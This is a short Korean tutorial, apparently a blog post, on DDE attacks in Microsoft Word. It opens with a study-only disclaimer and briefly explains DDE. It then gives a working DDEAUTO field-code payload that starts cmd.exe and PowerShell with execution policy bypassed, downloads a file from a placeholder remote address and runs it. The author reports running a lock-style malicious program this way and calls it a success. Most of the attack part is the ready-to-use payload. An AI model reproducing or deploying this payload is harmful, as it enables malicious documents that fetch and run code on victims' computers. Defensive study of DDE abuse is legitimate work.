DDE 공격

개인의 정보 보안 학습을 위해 작성되었습니다. 본 게시물을 불법적으로 활용하실 경우 혹은 본 게시물로 인해 발생하는 모든 문제에 대한 책임은 당사자에게 있으며, 작성자는 어떠한 법적 책임도 지지 않음을 밝힙니다. 해당 문서를 열람하는 것은 이에 대해 동의하는 것으로 간주합니다.

---

 

 

DDE(Dynamic Data Exchange)

---

사용자 편의를 위해 윈도우 운영체제에서 응용 프로그램간의 동일한 데이터를 공유하도록 허용하는 방법 중 하나로 워드뿐만 아니라 엑셀, 비쥬얼 베이직 등 다양한 응용프로그램에서 사용되고 있다.

 

실습

---

1. 삽입 - 빠른 문서 요소 - 필드 삽입 기능을 이용해 수식을 삽입해준다.

 

2. 우클릭-필드 코드 토클을 선택해 코맨드를 입력해준다.

{DDEAUTO C:\\Windows\\System32\\cmd.exe "/k powershell.exe -Nop -stat -ExecutionPolicy ByPass -command (New-Object System.Net.WebClient).DownloadFile('원격파일주소', '파일 이름'); ./실행파일이름 \* MERGEFORMAT \* MERGEFORMAT }

 

3. 문서 실행

나의 경우엔 비밀번호를 입력하지 않으면 강제종료되는 악성프로그램(a.exe)을 실행시켰다.

 

공격 성공